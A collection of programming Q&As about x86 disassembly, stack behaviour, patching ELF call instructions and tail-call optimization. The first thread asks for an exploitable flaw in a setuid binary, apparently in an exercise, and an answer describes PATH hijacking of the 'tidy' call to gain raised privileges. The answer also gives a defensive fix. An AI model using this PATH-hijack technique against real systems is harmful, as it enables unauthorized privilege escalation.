00 00
00010a86 e9 40 01 JMP LAB_00010bcb
00 00
LAB_00010a8b XREF[1]: 00010a72(j)
00010a8b 83 7d f0 00 CMP dword ptr [EBP + pid],0x0
00010a8f 0f 85 8c JNZ LAB_00010b21
00 00 00
00010a95 8b 45 e8 MOV EAX,dword ptr [EBP + pipefd[0]]
00010a98 6a 00 PUSH 0x0
00010a9a 50 PUSH EAX
00010a9b e8 60 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aa0 83 c4 08 ADD ESP,0x8
00010aa3 6a 01 PUSH 0x1
00010aa5 ff 75 f4 PUSH dword ptr [EBP + fd]
00010aa8 e8 53 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aad 83 c4 08 ADD ESP,0x8
00010ab0 6a 02 PUSH 0x2
00010ab2 ff 75 f4 PUSH dword ptr [EBP + fd]
00010ab5 e8 46 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aba 83 c4 08 ADD ESP,0x8
00010abd 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010ac0 50 PUSH EAX
00010ac1 e8 8a 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010ac6 83 c4 04 ADD ESP,0x4
00010ac9 ff 75 f4 PUSH dword ptr [EBP + fd]
00010acc e8 7f 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010ad1 83 c4 04 ADD ESP,0x4
00010ad4 ff 75 f8 PUSH dword ptr [EBP + in]
00010ad7 e8 74 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010adc 83 c4 04 ADD ESP,0x4
00010adf 6a 00 PUSH 0x0
00010ae1 68 8c 0c PUSH s_-asxml_00010c8c = "-asxml"
01 00
00010ae6 68 93 0c PUSH DAT_00010c93 = 74h t
01 00
00010aeb 68 93 0c PUSH DAT_00010c93 = 74h t
01 00
00010af0 e8 17 15 CALL <EXTERNAL>::execlp int execlp(char * __file, char *
00 00
00010af5 83 c4 10 ADD ESP,0x10
00010af8 68 98 0c PUSH s_execlp_00010c98 = "execlp"
01 00
00010afd e8 1a 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010b02 83 c4 04 ADD ESP,0x4
00010b05 b8 05 00 MOV EAX,0x5
00 00
00010b0a e9 bc 00 JMP LAB_00010bcb
00 00
LAB_00010b0f XREF[1]: 00010b34(j)
00010b0f 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010b12 6a 01 PUSH 0x1
00010b14 8d 55 e7 LEA EDX=>c,[EBP + -0x19]
00010b17 52 PUSH EDX
00010b18 50 PUSH EAX
00010b19 e8 1e 15 CALL <EXTERNAL>::write ssize_t write(int __fd, void * _
00 00
00010b1e 83 c4 0c ADD ESP,0xc
LAB_00010b21 XREF[1]: 00010a8f(j)
00010b21 6a 01 PUSH 0x1
00010b23 8d 45 e7 LEA EAX=>c,[EBP + -0x19]
00010b26 50 PUSH EAX
00010b27 ff 75 f8 PUSH dword ptr [EBP + in]
00010b2a e8 d5 14 CALL <EXTERNAL>::read ssize_t read(int __fd, void * __
00 00
00010b2f 83 c4 0c ADD ESP,0xc
00010b32 85 c0 TEST EAX,EAX
00010b34 75 d9 JNZ LAB_00010b0f
00010b36 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010b39 50 PUSH EAX
00010b3a e8 11 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b3f 83 c4 04 ADD ESP,0x4
00010b42 8b 45 e8 MOV EAX,dword ptr [EBP + pipefd[0]]
00010b45 50 PUSH EAX
00010b46 e8 05 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b4b 83 c4 04 ADD ESP,0x4
00010b4e ff 75 f4 PUSH dword ptr [EBP + fd]
00010b51 e8 fa 14 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b56 83 c4 04 ADD ESP,0x4
00010b59 ff 75 f8 PUSH dword ptr [EBP + in]
00010b5c e8 ef 14 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b61 83 c4 04 ADD ESP,0x4
00010b64 6a 00 PUSH 0x0
00010b66 8d 45 e0 LEA EAX=>status,[EBP + -0x20]
00010b69 50 PUSH EAX
00010b6a ff 75 f0 PUSH dword ptr [EBP + pid]
00010b6d e8 b2 14 CALL <EXTERNAL>::waitpid __pid_t waitpid(__pid_t __pid, i
00 00
00010b72 83 c4 0c ADD ESP,0xc
00010b75 8b 45 e0 MOV EAX,dword ptr [EBP + status]
00010b78 c1 f8 08 SAR EAX,0x8
00010b7b 0f b6 c0 MOVZX EAX,AL
00010b7e 83 f8 01 CMP EAX,0x1
00010b81 74 18 JZ LAB_00010b9b
00010b83 83 f8 02 CMP EAX,0x2
00010b86 74 22 JZ LAB_00010baa
00010b88 85 c0 TEST EAX,EAX
00010b8a 75 2d JNZ LAB_00010bb9
00010b8c 68 9f 0c PUSH DAT_00010c9f = 4Fh O
01 00
00010b91 e8 92 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010b96 83 c4 04 ADD ESP,0x4
00010b99 eb 2b JMP LAB_00010bc6
LAB_00010b9b XREF[1]: 00010b81(j)
00010b9b 68 a4 0c PUSH s_Your_file_is_not_completely_comp_00010ca4 = "Your file is not completely c
01 00
00010ba0 e8 83 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010ba5 83 c4 04 ADD ESP,0x4
00010ba8 eb 1c JMP LAB_00010bc6
LAB_00010baa XREF[1]: 00010b86(j)
00010baa 68 ca 0c PUSH s_Your_file_contains_errors_00010cca = "Your file contains errors"
01 00
00010baf e8 74 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010bb4 83 c4 04 ADD ESP,0x4
00010bb7 eb 0d JMP LAB_00010bc6
LAB_00010bb9 XREF[1]: 00010b8a(j)
00010bb9 68 e4 0c PUSH s_I_can't_tell_if_your_file_is_XHT_00010ce4 = "I can't tell if your file is
01 00
00010bbe e8 65 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010bc3 83 c4 04 ADD ESP,0x4
LAB_00010bc6 XREF[3]: 00010b99(j), 00010ba8(j),
00010bb7(j)
00010bc6 b8 00 00 MOV EAX,0x0
00 00
LAB_00010bcb XREF[6]: 000109d8(j), 00010a0b(j),
00010a3a(j), 00010a61(j),
00010a86(j), 00010b0a(j)
00010bcb 8b 5d fc MOV EBX,dword ptr [EBP + local_8]
00010bce c9 LEAVE
00010bcf c3 RET
According to Ghidra, this decompiles to:
int main(int argc,char **argv)
{
__uid_t __euid;
__uid_t __ruid;
__gid_t __egid;
__gid_t __rgid;
int iVar1;
int __fd;
int iVar2;
__pid_t __pid;
ssize_t sVar3;
uint uVar4;
int status;
char c;
int pipefd [2];
pid_t pid;
int fd;
int in;
__euid = geteuid();
__ruid = geteuid();
setreuid(__ruid,__euid);
__egid = getegid();
__rgid = getegid();
setregid(__rgid,__egid);
if (argv[1] == (char *)0x0) {
fwrite("Please specify the file to verify\n",1,0x22,stderr);
iVar1 = 1;
}
else {
iVar1 = open(argv[1],0);
if (iVar1 < 0) {
perror("open");
iVar1 = 2;
}
else {
__fd = open("/dev/null",2);
if (__fd < 0) {
perror("open");
iVar1 = 5;
}
else {
iVar2 = pipe(pipefd);
if (iVar2 < 0) {
perror("pipe");
iVar1 = 3;
}
else {
__pid = fork();
if (__pid < 0) {
perror("fork");
iVar1 = 4;
}
else if (__pid == 0) {
dup2(pipefd[0],0);
dup2(__fd,1);
dup2(__fd,2);
close(pipefd[1]);
close(__fd);
close(iVar1);
execlp("tidy","tidy","-asxml",0);
perror("execlp");
iVar1 = 5;
}
else {
while( true ) {
sVar3 = read(iVar1,&c,1);
if (sVar3 == 0) break;
write(pipefd[1],&c,1);
}
close(pipefd[1]);
close(pipefd[0]);
close(__fd);
close(iVar1);
waitpid(__pid,&status,0);
uVar4 = status >> 8 & 0xff;
if (uVar4 == 1) {
puts("Your file is not completely compliant");
}
else if (uVar4 == 2) {
puts("Your file contains errors");
}
else if (uVar4 == 0) {
puts("OK!");
}
else {
puts("I can\'t tell if your file is XHTML-compliant");
}
iVar1 = 0;
}
}
}
}
}
return iVar1;
}
To summarize, it appears to open the file passed as the first argument using open in read-only mode. If that succeeds, it forks and uses the child process to execute tidy to check that the file is valid XHTML.
Nothing about it stands out to me as an obvious vulnerability that I can use here. I've looked into vulnerabilities for the tidy command, but wasn't really able to find anything useful for this.
Any help would be much appreciated!
In regular C code, execlp("tidy","tidy","-asxml",0); is incorrect, as execlp() expects a null pointer argument to mark the end of the argument list.
0 is a null pointer only when used in a pointer context, which a variadic argument is not. Yet on architectures where pointers have the same size and passing convention as int, such as 32-bit Linux, passing 0 or passing NULL generates the same code, so sloppiness does not get punished.
In 64-bit mode, it would be incorrect to do so, but you might get lucky with the x86_64 ABI and a 64-bit 0 value will be passed in this case.
In your own code, avoid such pitfalls and use NULL or (char *)0 as the last argument for execlp(). But in this listing, Ghidra produces code that generates the same assembly code, and in 32-bit mode passing 0 or (char *)0 produces the same code, so no problem here.
In your context, execlp("tidy","tidy","-asxml",0); shows another problem: it will look for an executable program with the name tidy in the current PATH and run this program as tidy with a command line argument -asxml. Since it changed the effective uid and gid, this is a problem if the program is setuid root because you can create a program named tidy in a directory appearing in the PATH variable before the system directories and this program will be run with the modified rights.
Another potential problem is the program does not check for failure of the system calls setreuid() and setregid(). Although these calls are unlikely to fail for the arguments passed, as documented in the manual pages, it is a grave security error to omit checking for a failure return from setreuid(). In case of failure, the real and effective uid (or gid) is not changed and the process may fork and exec with root privileges.
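The two points above (checking the id-changing calls and not searching PATH) can be sketched together as follows. This is a minimal illustration, not the original program's source: the helper names set_ids_checked and exec_tidy are hypothetical, and the absolute path /usr/bin/tidy is an assumption about where tidy is installed.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: make the real ids equal to the effective ids and
 * check every return value. Returns 0 on success, -1 on failure. */
int set_ids_checked(void)
{
    gid_t egid = getegid();
    uid_t euid = geteuid();

    /* Change the group ids first, then the user ids. */
    if (setregid(egid, egid) != 0) {
        perror("setregid");
        return -1;
    }
    if (setreuid(euid, euid) != 0) {
        perror("setreuid");
        return -1;
    }
    return 0;
}

/* Hypothetical helper: run tidy without searching PATH.
 * It only returns if the exec failed. */
int exec_tidy(void)
{
    /* execl() does not consult PATH; the path below is an assumption.
     * The argument list ends with a real null pointer, not a bare 0. */
    execl("/usr/bin/tidy", "tidy", "-asxml", (char *)NULL);
    perror("execl");
    return -1;
}
```

A caller would refuse to fork or exec at all when set_ids_checked() returns -1, instead of continuing with ids it did not intend to keep.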

Why is a returned stack-pointer replaced by a null-pointer by gcc?

I've created the following function in c as a demonstration/small riddle about how the stack works in c:
#include "stdio.h"
int* func(int i)
{
int j = 3;
j += i;
return &j;
}
int main()
{
int *tmp = func(4);
printf("%d\n", *tmp);
func(5);
printf("%d\n", *tmp);
}
It's obviously undefined behavior and the compiler also produces a warning about that. However unfortunately the compilation didn't quite work out. For some reason gcc replaces the returned pointer by NULL (see line 6d6).
00000000000006aa <func>:
6aa: 55 push %rbp
6ab: 48 89 e5 mov %rsp,%rbp
6ae: 48 83 ec 20 sub $0x20,%rsp
6b2: 89 7d ec mov %edi,-0x14(%rbp)
6b5: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
6bc: 00 00
6be: 48 89 45 f8 mov %rax,-0x8(%rbp)
6c2: 31 c0 xor %eax,%eax
6c4: c7 45 f4 03 00 00 00 movl $0x3,-0xc(%rbp)
6cb: 8b 55 f4 mov -0xc(%rbp),%edx
6ce: 8b 45 ec mov -0x14(%rbp),%eax
6d1: 01 d0 add %edx,%eax
6d3: 89 45 f4 mov %eax,-0xc(%rbp)
6d6: b8 00 00 00 00 mov $0x0,%eax
6db: 48 8b 4d f8 mov -0x8(%rbp),%rcx
6df: 64 48 33 0c 25 28 00 xor %fs:0x28,%rcx
6e6: 00 00
6e8: 74 05 je 6ef <func+0x45>
6ea: e8 81 fe ff ff callq 570 <__stack_chk_fail@plt>
6ef: c9 leaveq
6f0: c3 retq
This is the disassembly of the binary compiled with gcc version 7.5.0 and the -O0 flag; no other flags were used. This behavior makes the entire code pointless, since it's supposed to show how the stack behaves across function calls. Is there any way to achieve a more literal compilation of this code with an at least somewhat up-to-date version of gcc?
And just for the sake of curiosity: what's the point of changing the behavior of the code like this in the first place?
Putting the return value in a pointer variable seems to change the behavior of the compiler and it generates the assembly code that returns a pointer to stack:
int* func(int i) {
int j = 3;
j += i;
int *p = &j;
return p;
}

Editing ELF binary call instruction

I am playing around with manipulating a binary's call functions. I have the below code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void myfunc2(char *str2, char *str1); /* defined after main */
void myfunc(char *str2, char *str1)
{
memcpy(str2 + strlen(str2), str1, strlen(str1));
}
int main(int argc, char **argv)
{
char str1[4] = "tim";
char str2[10] = "hello ";
myfunc((char *)&str2, (char *)&str1);
printf("%s\n", str2);
myfunc2((char *)&str2, (char *)&str1);
printf("%s\n", str2);
return 0;
}
void myfunc2(char *str2, char *str1)
{
memcpy(str2, str1, strlen(str1));
}
I have compiled the binary and using readelf or objdump I can see that my two functions reside at:
46: 000000000040072c 52 FUNC GLOBAL DEFAULT 13 myfunc2
54: 000000000040064d 77 FUNC GLOBAL DEFAULT 13 myfunc
Using the command objdump -D test (test is my binary's name), I can see that main has two callq instructions for my functions. I tried to edit the first one to point to myfunc2 using the above address 72c, but that does not work; it causes the binary to fail.
000000000040069a <main>:
40069a: 55 push %rbp
40069b: 48 89 e5 mov %rsp,%rbp
40069e: 48 83 ec 40 sub $0x40,%rsp
4006a2: 89 7d cc mov %edi,-0x34(%rbp)
4006a5: 48 89 75 c0 mov %rsi,-0x40(%rbp)
4006a9: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
4006b0: 00 00
4006b2: 48 89 45 f8 mov %rax,-0x8(%rbp)
4006b6: 31 c0 xor %eax,%eax
4006b8: c7 45 d0 74 69 6d 00 movl $0x6d6974,-0x30(%rbp)
4006bf: 48 b8 68 65 6c 6c 6f movabs $0x206f6c6c6568,%rax
4006c6: 20 00 00
4006c9: 48 89 45 e0 mov %rax,-0x20(%rbp)
4006cd: 66 c7 45 e8 00 00 movw $0x0,-0x18(%rbp)
4006d3: 48 8d 55 d0 lea -0x30(%rbp),%rdx
4006d7: 48 8d 45 e0 lea -0x20(%rbp),%rax
4006db: 48 89 d6 mov %rdx,%rsi
4006de: 48 89 c7 mov %rax,%rdi
4006e1: e8 67 ff ff ff callq 40064d <myfunc>
4006e6: 48 8d 45 e0 lea -0x20(%rbp),%rax
4006ea: 48 89 c7 mov %rax,%rdi
4006ed: e8 0e fe ff ff callq 400500 <puts@plt>
4006f2: 48 8d 55 d0 lea -0x30(%rbp),%rdx
4006f6: 48 8d 45 e0 lea -0x20(%rbp),%rax
4006fa: 48 89 d6 mov %rdx,%rsi
4006fd: 48 89 c7 mov %rax,%rdi
400700: e8 27 00 00 00 callq 40072c <myfunc2>
400705: 48 8d 45 e0 lea -0x20(%rbp),%rax
400709: 48 89 c7 mov %rax,%rdi
40070c: e8 ef fd ff ff callq 400500 <puts@plt>
400711: b8 00 00 00 00 mov $0x0,%eax
400716: 48 8b 4d f8 mov -0x8(%rbp),%rcx
40071a: 64 48 33 0c 25 28 00 xor %fs:0x28,%rcx
400721: 00 00
400723: 74 05 je 40072a <main+0x90>
400725: e8 f6 fd ff ff callq 400520 <__stack_chk_fail@plt>
40072a: c9 leaveq
40072b: c3 retq
I suspect I need to do something with calculating the address information through relative location or using the lea/mov instructions.
Any assistance to learn how to modify the call function would be greatly appreciated - please no pointers on editing strings like the howtos all over most of the internet...
In order to rewrite the address, you have to know the exact way the callq instructions are encoded.
Let's take the disassembly output of the first call:
4006e1: e8 67 ff ff ff callq 40064d <myfunc>
4006e6: ...
You can clearly see that the instruction is encoded in 5 bytes. The e8 byte is the instruction opcode, and 67 ff ff ff is its 4-byte operand, stored little-endian, so it reads as 0xffffff67. At this point, one would ask: what does 67 ff ff ff have to do with 0x40064d?
Well, the answer is that e8 encodes a so-called "relative call": the jump is performed relative to the location of the next instruction. To rewrite the address, you have to calculate the distance between 4006e6 and the function you want to call. Had the call been an absolute one (opcode ff), it would be indirect, taking the full target address from a register or memory location rather than from these 4 bytes.
To prove that this is the case, consider the following arithmetic, in which the carry out of the low 32 bits is discarded (0xffffff67 is -0x99 as a signed 32-bit value):
0x004006e6 + 0xffffff67 == 0x10040064d
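The same calculation can be sketched in C. This is only an illustration of the arithmetic under the assumptions of the listing above (a 5-byte e8 call, addresses taken from objdump); the names call_rel32 and encode_call are hypothetical helpers, not part of any tool.

```c
#include <stdint.h>

/* Length of an e8 (call rel32) instruction: 1 opcode byte + 4 operand bytes. */
#define CALL_REL32_LEN 5

/* Operand to store after the e8 opcode so that the call located at
 * call_addr reaches target. The distance is measured from the next
 * instruction and truncated to 32 bits. */
uint32_t call_rel32(uint64_t call_addr, uint64_t target)
{
    return (uint32_t)(target - (call_addr + CALL_REL32_LEN));
}

/* Write the five instruction bytes into out; the operand is little-endian. */
void encode_call(uint64_t call_addr, uint64_t target, uint8_t out[5])
{
    uint32_t rel = call_rel32(call_addr, target);
    out[0] = 0xe8;
    for (int i = 0; i < 4; i++)
        out[i + 1] = (uint8_t)(rel >> (8 * i));
}
```

With the addresses from the question, redirecting the first call in main (at 0x4006e1) to myfunc2 (0x40072c) gives 0x40072c - 0x4006e6 = 0x46, so the instruction bytes would become e8 46 00 00 00. The second call in the listing is a useful cross-check: it sits at 0x400700, and 0x40072c - 0x400705 = 0x27, which matches its encoding e8 27 00 00 00.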

Why does this code prevent gcc & llvm from tail-call optimization?

I have tried the following code with gcc 4.4.5 on Linux and with gcc-llvm on Mac OS X (Xcode 4.2.1). Below are the source and the generated disassembly of the relevant functions. (Added: compiled with gcc -O2 main.c)
#include <stdio.h>
__attribute__((noinline))
static void g(long num)
{
long m, n;
printf("%p %ld\n", &m, n);
return g(num-1);
}
__attribute__((noinline))
static void h(long num)
{
long m, n;
printf("%ld %ld\n", m, n);
return h(num-1);
}
__attribute__((noinline))
static void f(long * num)
{
scanf("%ld", num);
g(*num);
h(*num);
return f(num);
}
int main(void)
{
printf("int:%lu long:%lu unsigned:%lu\n", sizeof(int), sizeof(long), sizeof(unsigned));
long num;
f(&num);
return 0;
}
08048430 <g>:
8048430: 55 push %ebp
8048431: 89 e5 mov %esp,%ebp
8048433: 53 push %ebx
8048434: 89 c3 mov %eax,%ebx
8048436: 83 ec 24 sub $0x24,%esp
8048439: 8d 45 f4 lea -0xc(%ebp),%eax
804843c: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
8048443: 00
8048444: 89 44 24 04 mov %eax,0x4(%esp)
8048448: c7 04 24 d0 85 04 08 movl $0x80485d0,(%esp)
804844f: e8 f0 fe ff ff call 8048344 <printf@plt>
8048454: 8d 43 ff lea -0x1(%ebx),%eax
8048457: e8 d4 ff ff ff call 8048430 <g>
804845c: 83 c4 24 add $0x24,%esp
804845f: 5b pop %ebx
8048460: 5d pop %ebp
8048461: c3 ret
8048462: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
8048469: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
08048470 <h>:
8048470: 55 push %ebp
8048471: 89 e5 mov %esp,%ebp
8048473: 83 ec 18 sub $0x18,%esp
8048476: 66 90 xchg %ax,%ax
8048478: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
804847f: 00
8048480: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048487: 00
8048488: c7 04 24 d8 85 04 08 movl $0x80485d8,(%esp)
804848f: e8 b0 fe ff ff call 8048344 <printf@plt>
8048494: eb e2 jmp 8048478 <h+0x8>
8048496: 8d 76 00 lea 0x0(%esi),%esi
8048499: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
080484a0 <f>:
80484a0: 55 push %ebp
80484a1: 89 e5 mov %esp,%ebp
80484a3: 53 push %ebx
80484a4: 89 c3 mov %eax,%ebx
80484a6: 83 ec 14 sub $0x14,%esp
80484a9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
80484b0: 89 5c 24 04 mov %ebx,0x4(%esp)
80484b4: c7 04 24 e1 85 04 08 movl $0x80485e1,(%esp)
80484bb: e8 94 fe ff ff call 8048354 <__isoc99_scanf@plt>
80484c0: 8b 03 mov (%ebx),%eax
80484c2: e8 69 ff ff ff call 8048430 <g>
80484c7: 8b 03 mov (%ebx),%eax
80484c9: e8 a2 ff ff ff call 8048470 <h>
80484ce: eb e0 jmp 80484b0 <f+0x10>
We can see that g() and h() are mostly identical, except for the & (address-of) operator in front of the argument m of printf() (and the irrelevant difference between %ld and %p).
However, h() is tail-call optimized and g() is not. Why?
In g(), you're taking the address of a local variable and passing it to a function. A "sufficiently smart compiler" should realize that printf does not store that pointer. Instead, gcc and llvm assume that printf might store the pointer somewhere, so the call frame containing m might need to be "live" further down in the recursion. Therefore, no TCO.
It's the & that does it. It tells the compiler that m should be stored on the stack. Even though it is passed to printf, the compiler has to assume that it might be accessed by somebody else, and thus it must be cleaned from the stack after the call to g.
In this particular case, as printf is known by the compiler (and it knows that it does not save pointers), it could probably be taught to perform this optimization.
For more info on this, look up 'escape analysis'.
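If constant stack usage matters and the compiler cannot prove that the pointer does not escape, one option is to write the loop by hand instead of relying on tail-call optimization. The sketch below is a minimal illustration under that assumption: observe is a hypothetical stand-in for a function that receives the address of a local (as printf does in g()), and both walkers stop at zero so that they terminate, unlike the functions in the question. Whether the recursive form gets optimized depends on the compiler and its version.

```c
/* Hypothetical stand-in for a callee that receives a pointer to a local.
 * It only reads through the pointer and adds the value to *sink. */
void observe(const long *p, long *sink)
{
    *sink += *p;
}

/* Tail-recursive form: the address of m is passed to another function,
 * so the compiler may decide to keep each frame alive across the
 * recursive call instead of turning it into a jump. */
void walk_recursive(long num, long *sink)
{
    if (num == 0)
        return;
    long m = num;
    observe(&m, sink);
    walk_recursive(num - 1, sink);
}

/* Hand-written loop: the same work, with stack usage that stays constant
 * regardless of what the optimizer concludes about the pointer. */
void walk_loop(long num, long *sink)
{
    while (num != 0) {
        long m = num;
        observe(&m, sink);
        num--;
    }
}
```

Both functions visit the same values in the same order; only the loop version guarantees that the stack depth does not grow with num.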

Resources